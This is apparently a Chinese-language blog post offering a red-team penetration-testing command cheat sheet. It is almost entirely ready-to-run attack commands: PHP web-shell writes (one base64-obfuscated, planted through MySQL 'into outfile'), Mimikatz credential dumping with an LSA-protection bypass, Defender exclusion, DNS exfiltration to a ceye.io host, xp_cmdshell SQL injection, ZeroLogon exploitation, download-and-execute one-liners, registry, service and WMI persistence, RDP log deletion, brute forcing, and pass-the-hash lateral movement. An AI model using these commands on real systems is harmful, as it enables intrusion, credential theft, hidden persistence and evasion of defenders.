跳到主要内容
红队渗透测试常用命令速查大全 | 极客日志
Shell / Bash java
红队渗透测试常用命令速查大全 红队渗透测试中常用的命令行工具与技巧,涵盖命令执行、文件写入、端口扫描、密码爆破、内网穿透、权限维持及 Metasploit 使用等内容。包含 Linux 与 Windows 环境下的具体操作指令,如 nmap、masscan、hydra、mimikatz 等工具的用法,以及反弹 Shell、凭证获取和横向移动的方法。旨在为安全研究人员提供一份详细的命令参考手册。
监控大屏 发布于 2025/2/7 更新于 2026/6/5 常用命令
收集渗透中会用到的常用命令。
Java 命令执行
手动编码操作:
bash -c {echo ,cGluZyAxMjcuMC4wLjE7ZWNobyAxID50ZXN0LnR4dA==}|{base64 ,-d}|{bash,-i}
命令执行,定位资源文件写文件回显
Linux
find /|grep index.js|while read f;do sh -c "whoami" >$(dirname $f )/test.txt;done
Windows (注意盘符)
for /r D:\ %i in (index.js*) do whoami > %i/../test.txt
写 Shell
在 Windows 中,批处理需要转义字符主要有'&','|','<','>'等等,转义字符为'^'。
在 Linux 中,需要转义字符主要是单引号或者双引号。对于单引号,我们将其替换为\47 即可。
Windows 命令行最大长度为 8191,16 进制长度是 113898。Echo 写文件时注意长度。
方法 1
set /p=qaxnb<nul>d:\1d13.txt
方法 2
echo qaxnb>1we.txt
追加内容
echo qaxnb>>1we.txt
不换行追加
set /p="121d2">>a.txt
规避空格
echo.123>>a.txt
echo,123>>a.txt
type;a.txt
写特殊字符很多的文件,可以用 certutil 编码再还原。如下还原:
certutil -f -decode 111.txt C:\\111.jsp
certutil -decodehex 111.txt C:\\111.jsp
Linux 下 base64:
echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=|base64 -d > /var/www/html/shell.php
PHP 的:
echo \<\?php eval \(\@\$_POST \[1\]\)\; \?\> >1.php
绕过空格:
> < <> 重定向符
%09(需要 php 环境)
${IFS}
$IFS$9
{cat,flag.php}
%20
%09
Windows 打包目录 powershell -Command "Compress-Archive -Path E:\update\ -DestinationPath E:\test.zip"
匿名文件存储 curl --upload-file ./hello.txt https://transfer.sh/hello.txt
https://transfer.sh/fF6OA7aF8o/hello.txt
Nmap nmap -sn 10.11.1.0/24
nmap -sV -p- 10.11.1.0
nmap 10.11.1.0 --script vuln
nmap -p445 10.11.1.0 --script smb-vuln-ms17-010
nmap -v -sn -PE -n --min-hostgroup 1024 --min-parallelism 1024 -oG tmp -iL ip.txt | awk '{print $5}' | grep -v "latency)." > ok_ip.txt
nmap -n --unique --resolve-all -Pn --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m -oX {filename} --version-intensity 9 --min-rate 10000 -T4 192.168.23.1
nmap -n --resolve-all -Pn --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m -oX {filename} --version-intensity 9 --min-rate 10000 -T4 192.168.23.1
nmap -n --resolve-all -Pn --min-hostgroup --max-retries 3 --host-timeout 10m --script-timeout 3m --version-intensity 9 --min-rate 10000 --script=http-title -T4 -p- -iL domain.txt
Masscan 注意速率问题,根据带宽调整。100M 带宽可调 3000,注意是 VPS,不是家庭宽带。
关于编译,直接 git 拉下来,make 就行。生成的文件在 bin 下面。
masscan 192.168.1.110 -p 1-65535 --rate=1000
masscan -iL ip.txt -p1-65535 --rate=1000 -oL port.txt
cat port.txt |awk '{print $4":"$3}'
端口列表 22,23,135,445,389,3389,80,443,8080,7001,3306,1433,1521,6379,27017,2375,5900,5432,4899
21-23,80-90,135,137,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2375,2376,2601,2604,3128,3306,3311,3312,3389,4440,4848,5001,5432,5560,5900-5902,6082,6379,7001-7010,7778,8009,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,51111,50030,50060
...
字典 top200 123456 password 123456789 12345678 12345 qwerty 123123 111111 abc123 1234567 dragon 1q2w3e4r sunshine 654321 master 1234 football 1234567890 000000 computer 666666 superman michael internet iloveyou daniel 1qaz2wsx monkey shadow jessica letmein baseball whatever princess abcd1234 123321 starwars 121212 thomas zxcvbnm trustno1 killer welcome jordan aaaaaa 123qwe freedom password1 charlie batman jennifer 7777777 michelle diamond oliver mercedes benjamin 11111111 snoopy samantha victoria matrix george alexander secret cookie asdfgh 987654321 123abc orange fuckyou asdf1234 pepper hunter silver joshua banana 1q2w3e chelsea 1234qwer summer qwertyuiop phoenix andrew q1w2e3r4 elephant rainbow mustang merlin london garfield robert chocolate 112233 samsung qazwsx matthew buster jonathan ginger flower 555555 test caroline amanda maverick midnight martin junior 88888888 anthony jasmine creative patrick mickey 123 qwerty123 cocacola chicken passw0rd forever william nicole hello yellow nirvana justin friends cheese tigger mother liverpool blink182 asdfghjkl andrea spider scooter richard soccer rachel purple morgan melissa jackson arsenal 222222 qwe123 gabriel ferrari jasper danielle bandit angela scorpion prince maggie austin veronica nicholas monster dexter carlos thunder success hannah ashley 131313 stella brandon pokemon joseph asdfasdf 999999 metallica december chester taylor sophie samuel rabbit crystal barney xxxxxx steven ranger patricia christian asshole spiderman sandra hockey angels security parker heather 888888 victor harley 333333 system slipknot november jordan23 canada tennis qwertyui casper
Mimikatz .\\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
控制台执行多条命令,用 log 防止进程崩溃,数据丢失:
mimikatz # privilege::debug
mimikatz # log
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest
mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest
注册表开启 wdigest,08R2 后默认关闭。需要目标注销,重新登录。2016 需要重启。
reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1
Bypass LSA Protection (PPL) reg query HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa
把 mimidriver.sys 拷贝到同级目录,进行加载 bypass:
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::logonpasswords
mimikatz # !processprotect /process:lsass.exe
mimikatz # !-
CS 凭证解析 awk -F":::" '{print $1}' credentials.txt | awk -F"\\" '{print $2}'
awk -F":::" '{print $2}' credentials.txt
存活主机 for /L %I in (1,1,256) DO @ping -w 1 -l 1 192.168.202.%I | findstr "TTL="
Bypass Defender 排除项 powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\test"
Gobuster gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt
Dirsearch python3 dirsearch.py -e php,html,js -u https://target
python3 dirsearch.py -e php,html,js -u https://target -w /path/to/wordlist
python3 dirsearch.py -e php,htm,js,bak,zip,tgz,txt -u https://target -t 20
python3 dirsearch.py -e php,html,js -u https://target --proxy 127.0.0.1:8080
python3 dirsearch.py -e php,html,js -u https://target --proxy socks5://10.10.0.1:8080
Nbtscan
代理工具 Proxychain, Sockscap64, Proxifier。
内网穿透工具
Fuso 相对冷门,不会被杀。在 9004 上开启 socks5 代理。
Frp
Nps sudo ./nps install
sudo nps start
安装后配置文件位置/etc/nps,默认密码 admin/123。
Stowaway
Venom
SSH
Grep grep -E "([0-9]{1,3}[\.]){3}[0-9]{1,3}" -r xxx --color=auto
grep -E "https?://[a-zA-Z0-9\.\/\&_=@$%?~#-]*" -r xxx --color=auto
grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into" APKfolder/
grep -ohr -E "https?://[a-zA-Z0-9\.\/\&_=@$%?~#-]*" /app/ |sort |uniq >> test.txt
grep -EHirn '--include=*.' {java,jsp,jspx,xml,conf,json,ini,properties,yaml,toml,plist,txt,sql} "accesskey|api_key|apikey|jdbc|username|pass|passwd|password" webapps/
grep -r "test" ./src
grep -rn "test" ./src
MySQL use mysql;
update user set host = '%' where user = 'root' ;
FLUSH PRIVILEGES ;
select host, user from user ;
mysql - uroot - p - e "select * from mysql.user;" > 1. txt
mysql -uaHmin -proot test -e "select now()" -N >H:/work/target1.txt
mysql -uroot -e "show databases;" >1.txt
show variables like '%secure%'
select '<?php eval($_POST[xxx]) ?>' into outfile '/var/www/xx.php' ;
select '<?php eval($_POST[xx]) ?>' into dumpfile '/var/www/xx.php' ;
set global general_log= on ;
set global general_log_file= '/var/www/1.php' ;
select '<?php eval($_POST[s6]) ?>' ;
select '<?php file_put_contents("abab.php",base64_decode("Jmx0Oz9waHANCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQpzZXNzaW9uX3N0YXJ0KCk7DQogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IA0KCSRfU0VTU0lPTlsmIzM5O2smIzM5O109JGtleTsNCgkkcG9zdD1maWxlX2dldF9jb250ZW50cygicGhwOi8vaW5wdXQiKTsNCglpZighZXh0ZW5zaW9uX2xvYWRlZCgmIzM5O29wZW5zc2wmIzM5OykpDQoJew0KCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7DQoJCSRwb3N0PSR0KCRwb3N0LiIiKTsNCgkJDQoJCWZvcigkaT0wOyRpJmx0O3N0cmxlbigkcG9zdCk7JGkrKykgew0KICAgIAkJCSAkcG9zdFskaV0gPSAkcG9zdFskaV1eJGtleVskaSsxJjE1XTsgDQogICAgCQkJfQ0KCX0NCgllbHNlDQoJew0KCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsNCgl9DQogICAgJGFycj1leHBsb2RlKCYjMzk7fCYjMzk7LCRwb3N0KTsNCiAgICAkZnVuYz0kYXJyWzBdOw0KICAgICRwYXJhbXM9JGFyclsxXTsNCgljbGFzcyBDeHB1YmxpYyBmdW5jdGlvbiBfX2ludm9rZSgkcCkge2V2YWwoJHAuIiIpO319DQogICAgQGNhbGxfdXNlcl9mdW5jKG5ldyBDKCksJHBhcmFtcyk7DQo/Jmd0Ow0K' ))?> ' into outfile ' C:/ wamp/ www/ abb.php';
Sqlmap python sqlmap.py -u "http://www.vuln.cn/post.php?id=1" --proxy "http://127.0.0.1:1080"
python sqlmap.py -u "http://www.vuln.cn" –cookie "id=11" --level 2
python sqlmap.py -u "www.xxxx.com/product/detail/id/3*.html" --dbms=mysql -v 3
python sqlmap.py -u "http://www.vuln.cn/post.php?id=1" --dbms mysql --dbs
python sqlmap.py -u "http://www.vuln.cn/post.php?id=1" --dbms mysql -D test --tables
python sqlmap.py -u "http://www.vuln.cn/post.php?id=1" --dbms mysql -D test -T admin –-columns
python sqlmap.py -u "http://www.vuln.cn/post.php?id=1" --dbms mysql -D test -T admin -C "username,password" --dump
python sqlmap.py -r "c:\request.txt" -p id –dbms mysql –file-read="e:\www\as\config.php"
SQL 注入
MSSQL http://www.vuln.cn/post.php?id=11;DECLARE/**/@ljbd/**/VARCHAR(8000);SET/**/@ljbd=0x70696e67202d6e6320312077772e36373332396163312e646e732e313433332e65752e6f7267;EXEC/**/master..xp_cmdshell/**/@ljbd--
Gitlab 相关 gitlab-rails console production
/bin/rails console production
./rails console -e production
user = User .where(username: "root" ).first
user.password = "abc123"
user.password_confirmation= "abc123"
user.save!
user = User .where(username: "test" ).first
user.admin=ture
user.save!
找可写目录
Linux
在/root war 文件的同目录下 find /root -name war|while read file;do sh -c "echo $file " >$(dirname $file )/finddir.txt;done
find /root -name war|while read file;do sh -c "rm $(dirname $file) /finddir.txt" ;done
在/root war 文件夹下 find /root -name war|while read file;do sh -c "echo $file " >$file /finddir.txt;done
find /root -name war|while read file;do sh -c "rm $file /finddir.txt" ;done
Windows
在 C:\Users\liulangmao\Desktop 任意子目录 war.txt 文件的同目录下 for /f %i in ('dir /s /b C:\Users\liulangmao\Desktop\war.txt') do (echo %i > %i\..\finddir.txt)
for /f %i in ('dir /s /b C:\Users\liulangmao\Desktop\war.txt') do (del %i\..\finddir.txt)
在 C:\Users\liulangmao\Desktop 任意子目录 war 文件夹下 for /f %i in ('dir /s /b C:\Users\liulangmao\Desktop\war') do (echo %i > %i\finddir.txt)
for /f %i in ('dir /s /b C:\Users\liulangmao\Desktop\war') do (del %i\finddir.txt)
示例:在 weblogic 靶机/root 所有 war 文件夹下的 finddir.txt 文件中写入该 war 文件夹的路径。
find /root -name war|while read file;do sh -c "echo $file " >$file /finddir.txt;done
wmic process where name='mysqld.exe' get processid,executablepath,name
wmic process get name,executablepath,processid|findstr pid
for /f %i in ('dir /s /b D:\UFGOV\U8\login.jsp') do (echo %i)
echo|set /p=\"PCFET0NUWVBFIGh0bWw+IDxodG1sPiA8aGVhZD4gPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+PGgxPjIwMjHlubR4eHjnvZHnu5zlronlhajlrp7miJjmvJTnu4M8L2gxPg==\" > D:\UFGOV\U8\webapps\demonstrate.txt
powershell Get-ChildItem C:
Hydra 参数:-l 指定的用户名 -L 用户名字典 -p 指定密码 -P 密码字典 -s 指定端口 -o 输出文件 -t 任务数默认 16 -f 爆破成功一个就停止 -v 报错日志详细 -V 攻击日志。
hydra -L /root/user.txt -P pass.txt 10.1.1.10 mysql
hydra -L /root/user.txt -P pass.txt 10.1.1.10 ssh -s 22 -t 4
hydra -L /root/user.txt -P pass.txt 10.1.1.10 mssql -vv
hydra -L /root/user.txt -P pass.txt 10.1.1.10 rdp -V
hydra -L /root/user.txt -P pass.txt 10.1.1.10 smb -vV
hydra -L /root/user.txt -P pass.txt ftp://10.1.1.10
Medusa 参数:-h 目标名或 IP -H 目标列表 -u 用户名 -U 用户名字典 -p 密码 -P 密码字典 -f 爆破成功停止 -M 指定服务 -t 线程 -n 指定端口 -e ns 尝试空密码和用户名密码相同。
medusa -h ip -u sa -P /pass.txt -t 5 -f -M mssql
medusa -h ip -U /root/user.txt -P /pass.txt -t 5 -f -M mssql
Python 交互 Shell python3 -c "import pty;pty.spawn('/bin/bash')"
python2 -c 'import pty;spawn("/bin/sh")'
python -c 'import pty;spawn("/bin/bash")'
无交互添加用户 useradd newuser;echo "newuser:password" |chpasswd
useradd -p `openssl passwd 123456` guest
useradd -p "$(openssl passwd 123456) " guest
useradd newuwer;echo -e "123456\n123456\n" |passwd newuser
Windows net user admin$ Afabab@20 /add
net localgroup administrators admin$ /add
net user guest /active:yes
net localgroup administrators guest /add
Net localgroup Administrators kent /add /domain
Net localgroup Administrators /add test\kent
防火墙 netsh firewall set opmode mode=disable
netsh advfirewall firewall add rule name="88" protocol=TCP dir=in remoteport=8888 action=allow
netsh advfirewall firewall add rule name="88" protocol=TCP dir=out remoteport=8888 action=allow
netsh advfirewall firewall add rule name="44" protocol=TCP dir=out localport=4444 action=allow
netsh advfirewall firewall add rule name="44" protocol=TCP dir=in localport=4444 action=allow
netsh advfirewall firewall delete rule name="88"
netsh firewall show config
netsh advfirewall firewall add rule name="test" dir=in action=allow program="C:\windows\temp\update.exe" enable=yes
netsh advfirewall firewall add rule name="test" dir=out action=allow program="C:\windows\temp\update.exe" enable=yes
netsh interface portproxy add v4tov4 listenport=801 connectport=80 connectaddress=172.23.80.14
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
Frp 常用配置 [common]
server_addr = xxxxxx
server_port = 7000
[rdp]
type = tcp
local_port = 3389
remote_port = 3389
[plugin_http_proxy]
type = tcp
remote_port = 10801
plugin = http_proxy
[plugin_socks5]
type = tcp
remote_port = 1080
plugin = socks5
ZeroLogon 产生日志 4742(利用成功), 5580(利用失败)。流量特征明显。会被 AV 直接秒。有可能会导致目标脱域。代理不稳,容易出问题。
git clone https://github.com/mstxq17/cve-2020-1472.git
python3 zerologon_tester.py Dc02 172.23.119.120
PingCastle.exe --server 172.23.119.120 --scanner zerologon --scmode-dc
python3 cve-2020-1472-exploit.py Dc02$ 172.23.119.120
python3 secretsdump.py qq.local/'Dc02$' @172.23.119.120 -no-pass -outputfile qq.local.ntds.hash
用 administrator 域管账户 hash 远程导出域控机器账户 hash [hex 格式]:
python3 secretsdump.py -hashes :ccef208c6485269c20db2cad21734fe7 qq/[email protected]
python3 restorepassword.py Dc02@Dc02 -target-ip 172.23.119.120 -hexpass daf1d2acc25d2e54218921737a40d58192b9bcdf089ddbeaf9f7931571b07916f96e2c51d8d00f56d2440c13c0e5586e2dafd1669e37131***
删 RDP 日志 @echo off
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\attrib Default.rdp -s -h
del Default.rdp
开 3389 wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
net start TermService
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netstat -an|find "3389"
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0
文件搜索 findstr /s /i /n /d:C:\ /c:"123123" *.txt
for /r C: %i in (login.*) do @echo %i
where /R C: login.*
dir /s/a-d/b login.*
find / -name index.php
find / -name "index.php" | xargs grep "111222"
updatedb && locate index.php
wmic process get name,executablepath
命令执行无回显外带 OOB
Windows 在 windows 当中,%cd% 代表的是当前目录,我们通过 echo 将当前目录写入文本 temp,然后通过 certutil 对文件内容进行 base64 编码,再过滤 certutil 携带的字符,将它赋给一个变量,最后通过 nslookup 外带出来,从而实现获取当前目录的目的。
echo %cd% > temp&&certutil -encode temp temp1&&findstr /L /V "CERTIFICATE" temp1 > temp2&&set /p ADDR=<temp2&&nslookup %ADDR%.is1lv6.ceye.io
where /R C: login.* > test && certutil -encodehex -f test test.hex 4 && powershell $text=Get-Content test.hex;$sub=$text -replace(' ','');$j=11111;foreach($i in $sub){ $fin=$j.tostring()+'.'+$i+'.is1lv6.ceye.io';$j += 1; nslookup $fin }
%ALLUSERSPROFILE% 本地 返回'所有用户'配置文件的位置。
%APPDATA% 本地 返回默认情况下应用程序存储数据的位置。
%CD% 本地 返回当前目录字符串。
%CMDCMDLINE% 本地 返回用来启动当前的 Cmd.exe 的准确命令行。
%COMPUTERNAME% 系统 返回计算机的名称。
%COMSPEC% 系统 返回命令行解释器可执行程序的准确路径。
%DATE% 系统 返回当前日期。
%ERRORLEVEL% 系统 返回上一条命令的错误代码。
%HOMEDRIVE% 系统 返回连接到用户主目录的本地工作站驱动器号。
%HOMEPATH% 系统 返回用户主目录的完整路径。
%HOMESHARE% 系统 返回用户的共享主目录的网络路径。
%LOGONSERVER% 本地 返回验证当前登录会话的域控制器的名称。
%NUMBER_OF_PROCESSORS% 系统 指定安装在计算机上的处理器的数目。
%OS% 系统 返回操作系统名称。
%PATH% 系统 指定可执行文件的搜索路径。
%PATHEXT% 系统 返回操作系统认为可执行的文件扩展名的列表。
%PROCESSOR_ARCHITECTURE% 系统 返回处理器的芯片体系结构。
%PROCESSOR_IDENTFIER% 系统 返回处理器说明。
%PROCESSOR_LEVEL% 系统 返回计算机上安装的处理器的型号。
%PROCESSOR_REVISION% 系统 返回处理器的版本号。
%P ROMPT% 本地 返回当前解释程序的命令提示符设置。
%RANDOM% 系统 返回 0 到 32767 之间的任意十进制数字。
%SYSTEMDRIVE% 系统 返回包含 Windows server operating system 根目录的驱动器。
%SYSTEMROOT% 系统 返回 Windows server operating system 根目录的位置。
%TEMP%和%TMP% 系统和用户 返回对当前登录用户可用的应用程序所使用的默认临时目录。
%TIME% 系统 返回当前时间。
%USERDOMAIN% 本地 返回包含用户帐户的域的名称。
%USERNAME% 本地 返回当前登录的用户的名称。
%USERPROFILE% 本地 返回当前用户的配置文件的位置。
%WINDIR% 系统 返回操作系统目录的位置。
Linux 在 linux 中 pwd 也是查看当前目录的,我们通过 tr -d 将换行符去掉并通过 xxd -ps 将值转化为 16 进制,这样我们即可外带出自己想要的东西。
ping pwd |tr -d '\n' |xxd -ps.is1lv6.ceye.io
Base64 原理和上面类似,主要是对值进行 base64 编码,然后替换掉'=',即可成功外带数据。
pingpwd|base64 |tr -d '=' .is1lv6.ceye.io
var=11111 && for b in $(find / -name "index.php" | xargs grep "111222" |xxd -p); do var=$((var+1 )) && dig $var .$b .is1lv6.ceye.io; done
Windows 短文件名 短文件名查看:用"dir /x"命令可以方便地帮助您查看系统对目录或文件名的缩写。
常见短文件名:Documents and Settings 可表示为 DOCUME1;Local Settings 可表示为 LOCALS1;Program Files 表示为 PROGRA1;Program Files (x86) 表示为 PROGRA2。
PowerShell 文件下载 powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','C:\test\1.exe');start-process 'C:\test\1.exe'
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','1.exe')
Invoke-Expression (New-Object Net.WebClient).DownloadString("http://xxx.xx.xx.xx/test.ps1")
echo (new-object System.Net.WebClient).DownloadFile('http://192.168.31.93:8000/tomcat.exe','C:/Users/test/cc.exe')| powershell -
$Text = "(new-object System.Net.WebClient).DownloadFile('http://xxxxxxxxxx:8000/bddch.txt','bdchd.txt')"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText
$EncodedText = "dwByAGkAxxxxxxxxxxxxxxxxxxxAG0AbgB0AG4AJwA="
$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))
$DecodedText
powershell -noP -sta -enc xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Certutil.exe 下载 C:\Windows\System32\certutil.exe C:\Users\Public\cer.exe
certutil.exe -urlcache -split -f http://192.168.1.1/1.exe
certutil.exe -urlcache -split -f http://192.168.1.1/1.txt 1.exe
certutil.exe -urlcache -split -f http://192.168.6.27:8012/download/f.ext C:\windows\temp\up.exe &&start C:\windows\temp\up.exe
certutil.exe -urlcache -split -f http://192.168.1.1/1.exe delete
certutil.exe -urlcache *
certutil -encode lcx64.exe lcx64.txt
certutil -decode lcx64.txt lcx64.exe
certutil -hashfile a.exe MD5
Certutil & Certutil –urlcache –f –split url
Certutil | Certutil –urlcache –f –split url
Bitsadmin 不支持 https、ftp 协议,php python 带的服务器会出错。
bitsadmin /transfer n http://192.168.1.1/1.exe C:\test\update\1.exe
Wget 下载文件 wget -P /tmp http://127.0.0.1:8088/aliyun
Curl 下载 curl -o dodo1.jpg http:www.linux.com/dodo1.JPG
curl -O http://www.linux.com/dodo1.JPG
chmod +x /tmp/aliyun&&/tmp/aliyun
Windows 权限维持
Startup 目录 对当前用户有效:
C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
对所有用户有效:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
注册键 reg add "XXXX" /v evil /t REG_SZ /d "[Absolute Path]\evil.exe"
Load 注册键:HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load
Userinit 注册键:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
Explorer\Run 注册键:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
RunServicesOnce 注册键:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
RunServices 注册键:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
RunOnce\Setup 注册键:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup
RunOnce 注册键:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Run 注册键:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
服务 sc create evil binpath= "cmd.exe /k [Absolute Path]evil.exe" start= "auto" obj= "LocalSystem"
计划任务 SCHTASKS /Create /RU SYSTEM /SC ONSTART /RL HIGHEST /TN \Microsoft\Windows\evil\eviltask /TR C:\Users\hunter\Desktop\evil.exe
WMI 事件 wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="evil", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 310"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="evilConsumer", ExecutablePath="C:\Users\hunter\Desktop\beacon.exe",CommandLineTemplate="C:\Users\hunter\Desktop\beacon.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"evil\"", Consumer="CommandLineEventConsumer.Name=\"evilConsumer\""
屏幕保护 reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d C:\Users\hunter\Desktop\beacon.exe /f
reg add "hkcu\control panel\desktop" /v ScreenSaveActive /d 1 /f
reg add "hkcu\control panel\desktop" /v ScreenSaverIsSecure /d 0 /f
reg add "hkcu\control panel\desktop" /v ScreenSaveTimeOut /d 60 /f
Bitsadmin bitsadmin /create evil
bitsadmin /addfile evil "C:\Users\hunter\Desktop\beacon.exe" "C:\Users\hunter\Desktop\beacon.exe"
bitsadmin.exe /SetNotifyCmdLine evil "C:\Users\hunter\Desktop\beacon.exe" NUL
bitsadmin /Resume evil
Netsh 白加黑 可以通过导入 helperdll 的方式做权限维持,命令格式如下:
netsh add helper [Absolute evil DLL path]
但是由于 netsh 并不会开启自启动,因此还要再写一条自启动项:
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "cmd /c C:\Windows\System32\netsh"
重新启动后依然可获得 shell。
MSDTC 在默认的 Windows 安装中,System32 文件夹中缺少 oci.dll 这个文件,在获得写权限的情况下可以在该文件夹下写入一个同名的 dll,服务启动时执行恶意代码。默认情况下,由于启动类型设置为'手动',通过以下命令设置自启:
sc qc msdtc
sc config msdtc start= auto
Windows 信息收集常用命令 Systeminfo 计算机详细信息 (补丁信息)
Net start 所启动的服务
Wmic service list brief 查询本机服务信息
Tasklist 进程列表
Wmic startup get command,caption 查看启动该程序信息
Schtasks /query /fo LIST /v 计划任务
Netstat -ano 根据本机端口开放情况来判断有什么服务、其角色
Query user || qwinsta 查看当前在线用户
Net session 列出会话
Net share 查看本机的共享列表
Wmic share get name,path,status 查看共享列表
Net user 本地用户
Net user kkkk 查看本地用户信息
Net localgroup 本地用户组
Net localgroup /domain 域用户组
Net localgroup adminnstrators 本地管理员组成员
net localgroup adminstrators /domain 查看登陆过主机的管理员
Wmic useraccount get /all 获取域内用户详细信息
dsquery user 查看存在的用户
Net user /domain 域用户信息
Net user kkkk /domain 域用户 kkkk 信息
Net user kent password /add /domain 添加域用户
Net group /domain 域用户组信息
Net view /domain 查询域
Net view /domain:test 查询域内计算机
Net accounts /domain 查询域中密码策略
Net group "Domain Controllers" /domain 查看域控制器组
Net group "Domain computers" /domain 查看域内所有计算机列表
Net group "Domain admins" /domain 查看域内管理员用户
Net user /domain kent active:yes 启用域账户
Net user /domain kent active:no 禁用域账户
Nltest /DCLIST:test 查看域中域控制器名
Wmic useraccount get /all 用户详细信息
Net group "Domain Admins" /domain 对应组下的账户信息
nltest /domain_trusts 获取域信任信息
net config workstation 了解本机的配置信息
Netsh firewall show config 查看防火墙配置
Netsh advfirewall set allprofiles state off 关闭防火墙 (windows server 2003 后)
Netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe" 允许指定程序进入 (windows server 2003 后)
Netsh advfirewall firewall add rule name="allow nc" dir=out action=allow program="C:\nc.exe" 允许指定程序退出 (windows server 2003 后)
Netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow 允许 3389 连接 (windows server 2003 后)
Reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" 查看端口代理配置信息
Reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber 查看远程桌面端口号
At&Schtasks&Sc 横向 使用明文密码登录到目标,需要 445 和 139 端口开启:
net use \\192.168.2.148\ipc$ password /user:test\administrator
net use \\192.168.2.148\ipc$ password /user:administrator
copy c:\1.exe \\192.168.2.148\c$
at \\192.168.2.148 10:10 c:\1.exe
Schtasks /create /s 192.168.2.148 /ru 'SYSTEM' /tn executefile /sc DAILY /tr c:/1.exe /F
Schtasks /run /s 192.168.2.148 /tn executefile /i
Schtasks /delete /s 192.168.2.148 /tn executefile /f
sc \\192.168.210.107 create hacker binpath="c:\shell1.exe" #创建服务
sc \\192.168.210.107 start hacker #启动 hacker 服务
Impacket 包横向命令 Net use \192.168.202.148\ipc$ zxcvbnm123 /user:test\Administrator
Psexec \192.168.202.148 -accepteula -s cmd
Psexec \192.168.202.148 -u Administrator -p zxcvbnm123 -s cmd
PsExec -hashes :fac5d668099409cb6fa223a32ea493b6 test.com/[email protected] "whoami"
Wmic /node:192.168.202.148 /user:Administrator /password:zxcvbnm123 process call create "cmd.exe /c ipconfig >C:/1.txt"
